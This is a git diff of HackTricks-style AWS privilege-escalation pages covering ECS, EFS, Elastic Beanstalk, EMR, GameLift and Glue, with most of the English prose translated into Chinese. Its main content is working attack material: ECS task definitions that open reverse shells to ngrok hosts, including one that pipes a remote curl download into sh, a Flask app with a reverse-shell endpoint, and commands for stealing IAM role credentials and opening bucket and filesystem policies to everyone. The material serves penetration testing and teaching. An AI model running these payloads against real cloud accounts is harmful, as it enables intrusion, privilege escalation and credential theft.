"sourceVolume": "docker-socket" - } - ] - } +{ +"name":"exfil_creds", +"image":"python:latest", +"entryPoint":["sh", "-c"], +"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""], +"mountPoints": [ +{ +"readOnly": false, +"containerPath": "/var/run/docker.sock", +"sourceVolume": "docker-socket" +} +] +} ]' > /tmp/task.json printf '[ - { - "name": "docker-socket", - "host": { - "sourcePath": "/var/run/docker.sock" - } - } +{ +"name": "docker-socket", +"host": { +"sourcePath": "/var/run/docker.sock" +} +} ]' > /tmp/volumes.json aws ecs register-task-definition --family iam_exfiltration \ - --cpu 256 --memory 512 \ - --requires-compatibilities '["EC2"]' \ - --container-definitions file:///tmp/task.json \ - --volumes file:///tmp/volumes.json +--cpu 256 --memory 512 \ +--requires-compatibilities '["EC2"]' \ +--container-definitions file:///tmp/task.json \ +--volumes file:///tmp/volumes.json aws ecs run-task --task-definition iam_exfiltration \ - --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ - --launch-type EC2 +--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \ +--launch-type EC2 # You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell ``` - ### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`** -An attacker with the **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** can **execute commands** inside a running container and exfiltrate the IAM role attached to it (you need the describe permissions because it's necessary to run `aws ecs execute-command`).\ -However, in order to do that, the container instance need to be running the **ExecuteCommand agent** (which by default isn't). +拥有 **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** 的攻击者可以 **在运行的容器内执行命令** 并提取附加到它的 IAM 角色(您需要描述权限,因为运行 `aws ecs execute-command` 是必要的)。\ +然而,为此,容器实例需要运行 **ExecuteCommand agent**(默认情况下并不是)。 -Therefore, the attacker cloud try to: - -- **Try to run a command** in every running container +因此,攻击者可以尝试: +- **尝试在每个运行的容器中运行命令** ```bash # List enableExecuteCommand on each task for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do - echo "Cluster $cluster" - for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do - echo " Task $task" - # If true, it's your lucky day - aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand - done +echo "Cluster $cluster" +for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do +echo " Task $task" +# If true, it's your lucky day +aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand +done done # Execute a shell in a container aws ecs execute-command --interactive \ - --command "sh" \ - --cluster "$CLUSTER_ARN" \ - --task "$TASK_ARN" +--command "sh" \ +--cluster "$CLUSTER_ARN" \ +--task "$TASK_ARN" ``` +- 如果他有 **`ecs:RunTask`**,可以使用 `aws ecs run-task --enable-execute-command [...]` 运行一个任务 +- 如果他有 **`ecs:StartTask`**,可以使用 `aws ecs start-task --enable-execute-command [...]` 运行一个任务 +- 如果他有 **`ecs:CreateService`**,可以使用 `aws ecs create-service --enable-execute-command [...]` 创建一个服务 +- 如果他有 **`ecs:UpdateService`**,可以使用 `aws ecs update-service --enable-execute-command [...]` 更新一个服务 -- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` -- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` -- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` -- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` +您可以在 **之前的 ECS privesc 部分** 找到 **这些选项的示例**。 -You can find **examples of those options** in **previous ECS privesc sections**. - -**Potential Impact:** Privesc to a different role attached to containers. +**潜在影响:** 提升到附加在容器上的不同角色。 ### `ssm:StartSession` -Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**: +请查看 **ssm privesc 页面**,了解如何利用此权限 **提升到 ECS**: {{#ref}} aws-ssm-privesc.md @@ -198,7 +186,7 @@ aws-ssm-privesc.md ### `iam:PassRole`, `ec2:RunInstances` -Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**: +请查看 **ec2 privesc 页面**,了解如何利用这些权限 **提升到 ECS**: {{#ref}} aws-ec2-privesc.md @@ -206,30 +194,29 @@ aws-ec2-privesc.md ### `?ecs:RegisterContainerInstance` -TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker?? +TODO: 是否可以从不同的 AWS 账户注册一个实例,以便任务在攻击者控制的机器上运行? ### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets` > [!NOTE] -> TODO: Test this - -An attacker with the permissions `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` can **create a malicious task set for an existing ECS service and update the primary task set**. This allows the attacker to **execute arbitrary code within the service**. +> TODO: 测试这个 +拥有权限 `ecs:CreateTaskSet`、`ecs:UpdateServicePrimaryTaskSet` 和 `ecs:DescribeTaskSets` 的攻击者可以 **为现有的 ECS 服务创建一个恶意任务集并更新主任务集**。这允许攻击者 **在服务内执行任意代码**。 ```bash bashCopy code# Register a task definition with a reverse shell echo '{ - "family": "malicious-task", - "containerDefinitions": [ - { - "name": "malicious-container", - "image": "alpine", - "command": [ - "sh", - "-c", - "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" - ] - } - ] +"family": "malicious-task", +"containerDefinitions": [ +{ +"name": "malicious-container", +"image": "alpine", +"command": [ +"sh", +"-c", +"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh" +] +} +] }' > malicious-task-definition.json aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json @@ -240,15 +227,10 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service -- # Update the primary task set for the service aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id ``` +**潜在影响**:在受影响的服务中执行任意代码,可能影响其功能或泄露敏感数据。 -**Potential Impact**: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data. - -## References +## 参考文献 - [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md index 8a54b28d8..3e63c396c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md @@ -4,97 +4,83 @@ ## EFS -More **info about EFS** in: +更多关于 EFS 的信息在: {{#ref}} ../aws-services/aws-efs-enum.md {{#endref}} -Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it. +请记住,为了挂载 EFS,您需要在 EFS 被暴露的子网络中并且拥有访问权限(安全组)。如果发生这种情况,默认情况下,您将始终能够挂载它,但是,如果它受到 IAM 策略的保护,您需要拥有此处提到的额外权限才能访问它。 ### `elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy` -With any of those permissions an attacker can **change the file system policy** to **give you access** to it, or to just **delete it** so the **default access** is granted. - -To delete the policy: +拥有任何这些权限,攻击者可以 **更改文件系统策略** 以 **授予您访问权限**,或者仅仅 **删除它** 以便 **授予默认访问**。 +要删除策略: ```bash aws efs delete-file-system-policy \ - --file-system-id +--file-system-id ``` - -To change it: - +要更改它: ```json aws efs put-file-system-policy --file-system-id --policy file:///tmp/policy.json // Give everyone trying to mount it read, write and root access // policy.json: { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", - "Statement": [ - { - "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "elasticfilesystem:ClientRootAccess", - "elasticfilesystem:ClientWrite", - "elasticfilesystem:ClientMount" - ], - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763", +"Statement": [ +{ +"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"elasticfilesystem:ClientRootAccess", +"elasticfilesystem:ClientWrite", +"elasticfilesystem:ClientMount" +], +"Condition": { +"Bool": { +"elasticfilesystem:AccessedViaMountTarget": "true" +} +} +} +] } ``` - ### `elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)` -With this permission an attacker will be able to **mount the EFS**. If the write permission is not given by default to everyone that can mount the EFS, he will have only **read access**. - +拥有此权限的攻击者将能够**挂载 EFS**。如果默认情况下没有给予所有可以挂载 EFS 的人写权限,他将只有**读取访问权限**。 ```bash sudo mkdir /efs sudo mount -t efs -o tls,iam :/ /efs/ ``` +额外的权限`elasticfilesystem:ClientRootAccess`和`elasticfilesystem:ClientWrite`可以在文件系统挂载后用于**写入**文件系统内部,并以**root**身份**访问**该文件系统。 -The extra permissions`elasticfilesystem:ClientRootAccess` and `elasticfilesystem:ClientWrite` can be used to **write** inside the filesystem after it's mounted and to **access** that file system **as root**. - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**潜在影响:** 通过在文件系统中定位敏感信息进行间接权限提升。 ### `elasticfilesystem:CreateMountTarget` -If you an attacker is inside a **subnetwork** where **no mount target** of the EFS exists. He could just **create one in his subnet** with this privilege: - +如果攻击者在**子网络**中,且**没有挂载目标**的EFS,他可以利用此权限**在他的子网络中创建一个**: ```bash # You need to indicate security groups that will grant the user access to port 2049 aws efs create-mount-target --file-system-id \ - --subnet-id \ - --security-groups +--subnet-id \ +--security-groups ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**潜在影响:** 通过在文件系统中定位敏感信息进行间接权限提升。 ### `elasticfilesystem:ModifyMountTargetSecurityGroups` -In a scenario where an attacker finds that the EFS has mount target in his subnetwork but **no security group is allowing the traffic**, he could just **change that modifying the selected security groups**: - +在攻击者发现EFS在他的子网络中有挂载目标但**没有安全组允许流量**的情况下,他可以**通过修改所选安全组来改变这一点**: ```bash aws efs modify-mount-target-security-groups \ - --mount-target-id \ - --security-groups +--mount-target-id \ +--security-groups ``` - -**Potential Impact:** Indirect privesc by locating sensitive information in the file system. +**潜在影响:** 通过在文件系统中定位敏感信息进行间接权限提升。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md index 613dd3a47..96b633c3c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md @@ -4,19 +4,18 @@ ## Elastic Beanstalk -More **info about Elastic Beanstalk** in: +更多关于 **Elastic Beanstalk** 的信息在: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} > [!WARNING] -> In order to perform sensitive actions in Beanstalk you will need to have a **lot of sensitive permissions in a lot of different services**. You can check for example the permissions given to **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** +> 为了在 Beanstalk 中执行敏感操作,您需要在许多不同的服务中拥有 **大量敏感权限**。您可以检查例如授予 **`arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk`** 的权限。 -### `elasticbeanstalk:RebuildEnvironment`, S3 write permissions & many others - -With **write permissions over the S3 bucket** containing the **code** of the environment and permissions to **rebuild** the application (it's needed `elasticbeanstalk:RebuildEnvironment` and a few more related to `S3` , `EC2` and `Cloudformation`), you can **modify** the **code**, **rebuild** the app and the next time you access the app it will **execute your new code**, allowing the attacker to compromise the application and the IAM role credentials of it. +### `elasticbeanstalk:RebuildEnvironment`、S3 写权限及其他 +拥有 **对包含环境代码的 S3 存储桶的写权限** 和 **重建** 应用程序的权限(需要 `elasticbeanstalk:RebuildEnvironment` 以及与 `S3`、`EC2` 和 `Cloudformation` 相关的其他权限),您可以 **修改** **代码**、**重建** 应用程序,下次访问应用程序时,它将 **执行您的新代码**,使攻击者能够危害应用程序及其 IAM 角色凭证。 ```bash # Create folder mkdir elasticbeanstalk-eu-west-1-947247140022 @@ -31,56 +30,42 @@ aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247 # Rebuild env aws elasticbeanstalk rebuild-environment --environment-name "env-name" ``` +### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`,以及更多... -### `elasticbeanstalk:CreateApplication`, `elasticbeanstalk:CreateEnvironment`, `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `iam:PassRole`, and more... - -The mentioned plus several **`S3`**, **`EC2`, `cloudformation`** ,**`autoscaling`** and **`elasticloadbalancing`** permissions are the necessary to create a raw Elastic Beanstalk scenario from scratch. - -- Create an AWS Elastic Beanstalk application: +提到的权限加上几个 **`S3`**,**`EC2`**,**`cloudformation`**,**`autoscaling`** 和 **`elasticloadbalancing`** 权限是从头创建一个原始的 Elastic Beanstalk 场景所必需的。 +- 创建一个 AWS Elastic Beanstalk 应用程序: ```bash aws elasticbeanstalk create-application --application-name MyApp ``` - -- Create an AWS Elastic Beanstalk environment ([**supported platforms**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): - +- 创建一个 AWS Elastic Beanstalk 环境 ([**支持的平台**](https://docs.aws.amazon.com/elasticbeanstalk/latest/platforms/platforms-supported.html#platforms-supported.python)): ```bash aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role ``` +如果环境已经创建,并且你**不想创建一个新的环境**,你可以直接**更新**现有的环境。 -If an environment is already created and you **don't want to create a new one**, you could just **update** the existent one. - -- Package your application code and dependencies into a ZIP file: - +- 将你的应用程序代码和依赖项打包成一个ZIP文件: ```python zip -r MyApp.zip . ``` - -- Upload the ZIP file to an S3 bucket: - +- 将ZIP文件上传到S3桶: ```python aws s3 cp MyApp.zip s3://elasticbeanstalk--/MyApp.zip ``` - -- Create an AWS Elastic Beanstalk application version: - +- 创建一个 AWS Elastic Beanstalk 应用程序版本: ```css aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk--",S3Key="MyApp.zip" ``` - -- Deploy the application version to your AWS Elastic Beanstalk environment: - +- 将应用程序版本部署到您的 AWS Elastic Beanstalk 环境: ```bash aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0 ``` - ### `elasticbeanstalk:CreateApplicationVersion`, `elasticbeanstalk:UpdateEnvironment`, `cloudformation:GetTemplate`, `cloudformation:DescribeStackResources`, `cloudformation:DescribeStackResource`, `autoscaling:DescribeAutoScalingGroups`, `autoscaling:SuspendProcesses`, `autoscaling:SuspendProcesses` -First of all you need to create a **legit Beanstalk environment** with the **code** you would like to run in the **victim** following the **previous steps**. Potentially a simple **zip** containing these **2 files**: +首先,您需要创建一个**合法的 Beanstalk 环境**,其中包含您希望在**受害者**上运行的**代码**,按照**之前的步骤**进行操作。可能是一个简单的**zip**文件,包含这**2个文件**: {{#tabs }} {{#tab name="application.py" }} - ```python from flask import Flask, request, jsonify import subprocess,os, socket @@ -89,34 +74,32 @@ application = Flask(__name__) @application.errorhandler(404) def page_not_found(e): - return jsonify('404') +return jsonify('404') @application.route("/") def index(): - return jsonify('Welcome!') +return jsonify('Welcome!') @application.route("/get_shell") def search(): - host=request.args.get('host') - port=request.args.get('port') - if host and port: - s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) - s.connect((host,int(port))) - os.dup2(s.fileno(),0) - os.dup2(s.fileno(),1) - os.dup2(s.fileno(),2) - p=subprocess.call(["/bin/sh","-i"]) - return jsonify('done') +host=request.args.get('host') +port=request.args.get('port') +if host and port: +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect((host,int(port))) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +p=subprocess.call(["/bin/sh","-i"]) +return jsonify('done') if __name__=="__main__": - application.run() +application.run() ``` - {{#endtab }} {{#tab name="requirements.txt" }} - ``` click==7.1.2 Flask==1.1.2 @@ -125,44 +108,42 @@ Jinja2==2.11.3 MarkupSafe==1.1.1 Werkzeug==1.0.1 ``` - {{#endtab }} {{#endtabs }} -Once you have **your own Beanstalk env running** your rev shell, it's time to **migrate** it to the **victims** env. To so so you need to **update the Bucket Policy** of your beanstalk S3 bucket so the **victim can access it** (Note that this will **open** the Bucket to **EVERYONE**): - +一旦你有了 **自己的 Beanstalk 环境运行** 你的反向 shell,就该 **迁移** 到 **受害者** 环境了。为此,你需要 **更新你的 Beanstalk S3 存储桶的策略**,以便 **受害者可以访问它**(请注意,这将 **开放** 存储桶给 **所有人**): ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "s3:ListBucket", - "s3:ListBucketVersions", - "s3:GetObject", - "s3:GetObjectVersion", - "s3:*" - ], - "Resource": [ - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" - ] - }, - { - "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", - "Effect": "Deny", - "Principal": { - "AWS": "*" - }, - "Action": "s3:DeleteBucket", - "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"s3:ListBucket", +"s3:ListBucketVersions", +"s3:GetObject", +"s3:GetObjectVersion", +"s3:*" +], +"Resource": [ +"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", +"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" +] +}, +{ +"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", +"Effect": "Deny", +"Principal": { +"AWS": "*" +}, +"Action": "s3:DeleteBucket", +"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" +} +] } ``` @@ -181,9 +162,4 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md index 0025abe52..c4e1a09f5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md @@ -4,7 +4,7 @@ ## EMR -More **info about EMR** in: +更多关于 **EMR** 的信息在: {{#ref}} ../aws-services/aws-emr-enum.md @@ -12,57 +12,51 @@ More **info about EMR** in: ### `iam:PassRole`, `elasticmapreduce:RunJobFlow` -An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ -Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). - +拥有这些权限的攻击者可以 **运行一个新的 EMR 集群并附加 EC2 角色**,并尝试窃取其凭证。\ +请注意,为了做到这一点,您需要 **知道在账户中导入的一些 ssh 私钥** 或导入一个,并能够 **在主节点上打开 22 端口**(您可能能够通过 `--ec2-attributes` 中的 `EmrManagedMasterSecurityGroup` 和/或 `ServiceAccessSecurityGroup` 属性来做到这一点)。 ```bash # Import EC2 ssh key (you will need extra permissions for this) ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" chmod 400 /tmp/sshkey base64 /tmp/sshkey.pub > /tmp/pub.key aws ec2 import-key-pair \ - --key-name "privesc" \ - --public-key-material file:///tmp/pub.key +--key-name "privesc" \ +--public-key-material file:///tmp/pub.key aws emr create-cluster \ - --release-label emr-5.15.0 \ - --instance-type m4.large \ - --instance-count 1 \ - --service-role EMR_DefaultRole \ - --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc +--release-label emr-5.15.0 \ +--instance-type m4.large \ +--instance-count 1 \ +--service-role EMR_DefaultRole \ +--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc # Wait 1min and connect via ssh to an EC2 instance of the cluster) aws emr describe-cluster --cluster-id # In MasterPublicDnsName you can find the DNS to connect to the master instance ## You cna also get this info listing EC2 instances ``` +注意如何在 `--service-role` 中指定 **EMR 角色**,以及在 `--ec2-attributes` 中指定 **ec2 角色**,位于 `InstanceProfile` 内。然而,这种技术仅允许窃取 EC2 角色凭证(因为您将通过 ssh 连接),而无法窃取 EMR IAM 角色。 -Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. - -**Potential Impact:** Privesc to the EC2 service role specified. +**潜在影响:** 提升到指定的 EC2 服务角色。 ### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` -With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. +拥有这些权限的攻击者可以进入 **AWS 控制台**,创建一个 Notebook 并访问它以窃取 IAM 角色。 > [!CAUTION] -> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. +> 即使您在我的测试中将 IAM 角色附加到 Notebook 实例,我注意到我能够窃取 AWS 管理的凭证,而不是与 IAM 角色相关的凭证。 -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile +**潜在影响:** 提升到 AWS 管理角色 arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile ### `elasticmapreduce:OpenEditorInConsole` -Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ -The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` +仅凭此权限,攻击者将能够访问 **Jupyter Notebook 并窃取与之关联的 IAM 角色**。\ +Notebook 的 URL 是 `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` > [!CAUTION] -> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related +> 即使您在我的测试中将 IAM 角色附加到 Notebook 实例,我注意到我能够窃取 AWS 管理的凭证,而不是与 IAM 角色相关的凭证。 -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile +**潜在影响:** 提升到 AWS 管理角色 arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md index b40cdf413..b3ffb541f 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md @@ -4,19 +4,13 @@ ### `gamelift:RequestUploadCredentials` -With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. - +通过此权限,攻击者可以检索一组**用于上传**新游戏构建文件到Amazon GameLift的Amazon S3的**新凭证**。它将返回**S3上传凭证**。 ```bash aws gamelift request-upload-credentials \ - --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 +--build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 ``` - -## References +## 参考 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md index 049d3b273..1632ab54b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md @@ -6,15 +6,14 @@ ### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) -Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint. - -After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role: +拥有这些权限的用户可以**设置一个新的 AWS Glue 开发端点**,**将一个现有的服务角色分配给 Glue**,并为该端点指定特定权限。 +设置完成后,**攻击者可以通过 SSH 进入端点的实例**,并窃取分配角色的 IAM 凭证: ```bash # Create endpoint aws glue create-dev-endpoint --endpoint-name \ - --role-arn \ - --public-key file:///ssh/key.pub +--role-arn \ +--public-key file:///ssh/key.pub # Get the public address of the instance ## You could also use get-dev-endpoints @@ -23,19 +22,17 @@ aws glue get-dev-endpoint --endpoint-name privesctest # SSH with the glue user ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com ``` +为了隐蔽目的,建议使用来自 Glue 虚拟机的 IAM 凭证。 -For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine. - -**Potential Impact:** Privesc to the glue service role specified. +**潜在影响:** 提升到指定的 Glue 服务角色。 ### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) -Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role: - +拥有此权限的用户可以**更改现有 Glue 开发**端点的 SSH 密钥,**从而启用对其的 SSH 访问**。这允许攻击者以端点附加角色的权限执行命令: ```bash # Change public key to connect aws glue --endpoint-name target_endpoint \ - --public-key file:///ssh/key.pub +--public-key file:///ssh/key.pub # Get the public address of the instance ## You could also use get-dev-endpoints @@ -44,13 +41,11 @@ aws glue get-dev-endpoint --endpoint-name privesctest # SSH with the glue user ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com ``` - -**Potential Impact:** Privesc to the glue service role used. +**潜在影响:** 提升到所使用的 Glue 服务角色。 ### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`) -Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role: - +具有 **`iam:PassRole`** 权限的用户,结合 **`glue:CreateJob` 或 `glue:UpdateJob`**,以及 **`glue:StartJobRun` 或 `glue:CreateTrigger`**,可以 **创建或更新 AWS Glue 作业**,附加任何 **Glue 服务账户**,并启动作业的执行。该作业的功能包括运行任意 Python 代码,这可以被利用来建立反向 shell。然后可以利用这个反向 shell 来提取附加到 Glue 作业的 **IAM 凭证**,从而导致基于该角色权限的潜在未授权访问或操作: ```bash # Content of the python script saved in s3: #import socket,subprocess,os @@ -65,32 +60,27 @@ Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:U # A Glue role with admin access was created aws glue create-job \ - --name privesctest \ - --role arn:aws:iam::93424712358:role/GlueAdmin \ - --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' +--name privesctest \ +--role arn:aws:iam::93424712358:role/GlueAdmin \ +--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' # You can directly start the job aws glue start-job-run --job-name privesctest # Or you can create a trigger to start it aws glue create-trigger --name triggerprivesc --type SCHEDULED \ - --actions '[{"JobName": "privesctest"}]' --start-on-creation \ - --schedule "0/5 * * * * *" #Every 5mins, feel free to 